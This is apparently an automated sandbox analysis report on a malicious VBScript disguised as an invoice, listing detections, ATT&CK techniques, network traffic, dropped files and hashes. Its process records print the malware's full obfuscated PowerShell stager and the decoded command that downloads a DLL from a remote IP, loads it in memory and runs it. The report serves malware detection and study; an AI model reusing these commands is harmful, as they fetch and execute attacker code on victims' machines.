Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
Path Interception11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts221
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts2
PowerShell
Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)221
Scripting
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer2
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Ref. No INV088002904SINO.vbs27%ReversingLabsScript-WScript.Trojan.Heuristic
Ref. No INV088002904SINO.vbs13%VirustotalBrowse
Ref. No INV088002904SINO.vbs20%MetadefenderBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://20.7.14.9923%VirustotalBrowse
http://20.7.14.99/server/dll.txt26%VirustotalBrowse
http://20.7.14.99100%Avira URL Cloudmalware
http://20.7.14.99/server/dll.txt100%Avira URL Cloudmalware
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://20.7.14.99/server/dll.txttrue
  • 26%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.340730750.000001B0A2A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.350622137.00000216A0541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.320814767.000001B092A11000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://20.7.14.99powershell.exe, 00000003.00000002.339339189.000001B09412F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.325801923.000001B093624000.00000004.00000800.00020000.00000000.sdmptrue
        • 23%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.321573407.000001B092C24000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://contoso.com/powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.340730750.000001B0A2A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://contoso.com/Licensepowershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000003.00000002.341871751.000001B0A2BB2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            20.7.14.99
            unknownUnited States
            8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:699422
            Start date and time:2022-09-08 07:30:11 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 7s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:Ref. No INV088002904SINO.vbs
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:11
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal92.evad.winVBS@6/5@0/1
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Adjust boot time
            • Enable AMSI
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Execution Graph export aborted for target powershell.exe, PID 4764 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 5976 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            07:31:08API Interceptor36x Sleep call for process: powershell.exe modified
            No context
            No context
            No context
            No context
            No context
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.9260988789684415
            Encrypted:false
            SSDEEP:3:Nlllulb/lj:NllUb/l
            MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
            SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
            SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
            SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
            Malicious:false
            Reputation:high, very likely benign file
            Preview:@...e................................................@..........
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview:1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview:1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            File type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
            Entropy (8bit):1.8691180098720446
            TrID:
            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
            • MP3 audio (1001/1) 32.22%
            • Lumena CEL bitmap (63/63) 2.03%
            • Corel Photo Paint (41/41) 1.32%
            File name:Ref. No INV088002904SINO.vbs
            File size:656818
            MD5:78f2e521d65cd356494edd52bfa2eb94
            SHA1:abd02c0ece3445944708037fcfeffa0f69c14319
            SHA256:e844196a40b506f2d00760b7dfcb2474c56f30c705d078cb265b8871aeca8e79
            SHA512:22ffd9687ee50924e0ddc7b04f39ad36b92c28635b86fb2fc3aabf7d98cabf5d22f928e15a73ecd19723fc30735a4a5bd8c0f712db6f1a5a40010c56c7d89c60
            SSDEEP:192:AkiQQuYbJTFYVXqrIduTjEZ9iImtwDYmNoqzhKkOmr:AkqFp6/RDYmjl
            TLSH:7BD4FF13745ADEC252D231435AD3F67827FAA2E99E3F86940ACD8C4D02E862C425B7D3
            File Content Preview:..:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.....:.:.....:.....:.....:.....:.....:.....:.....:.....:.:.....:.....:.....:.....:.....:.....:.....:.....:.:.....:.....:.....:.....:.....:.....:.....:.....:
            Icon Hash:e8d69ece869a9ec4
            TimestampSource PortDest PortSource IPDest IP
            Sep 8, 2022 07:31:10.193434954 CEST4970980192.168.2.420.7.14.99
            Sep 8, 2022 07:31:10.300112009 CEST804970920.7.14.99192.168.2.4
            Sep 8, 2022 07:31:10.300251007 CEST4970980192.168.2.420.7.14.99
            Sep 8, 2022 07:31:10.300635099 CEST4970980192.168.2.420.7.14.99
            Sep 8, 2022 07:31:10.408555984 CEST804970920.7.14.99192.168.2.4
            Sep 8, 2022 07:31:10.460522890 CEST4970980192.168.2.420.7.14.99
            Sep 8, 2022 07:31:13.013134003 CEST4970980192.168.2.420.7.14.99
            • 20.7.14.99
            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.44970920.7.14.9980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampkBytes transferredDirectionData
            Sep 8, 2022 07:31:10.300635099 CEST99OUTGET /server/dll.txt HTTP/1.1
            Host: 20.7.14.99
            Connection: Keep-Alive
            Sep 8, 2022 07:31:10.408555984 CEST100INHTTP/1.1 404 Not Found
            Date: Thu, 08 Sep 2022 05:31:10 GMT
            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
            Content-Length: 297
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 37 2e 34 2e 32 39 20 53 65 72 76 65 72 20 61 74 20 32 30 2e 37 2e 31 34 2e 39 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 20.7.14.99 Port 80</address></body></html>


            Click to jump to process

            Target ID:0
            Start time:07:31:02
            Start date:08/09/2022
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Ref. No INV088002904SINO.vbs"
            Imagebase:0x7ff6538c0000
            File size:163840 bytes
            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:1
            Start time:07:31:03
            Start date:08/09/2022
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe
            Imagebase:0x7ff754c30000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high

            Target ID:2
            Start time:07:31:04
            Start date:08/09/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7c72c0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:3
            Start time:07:31:07
            Start date:08/09/2022
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
            Imagebase:0x7ff754c30000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high

            No disassembly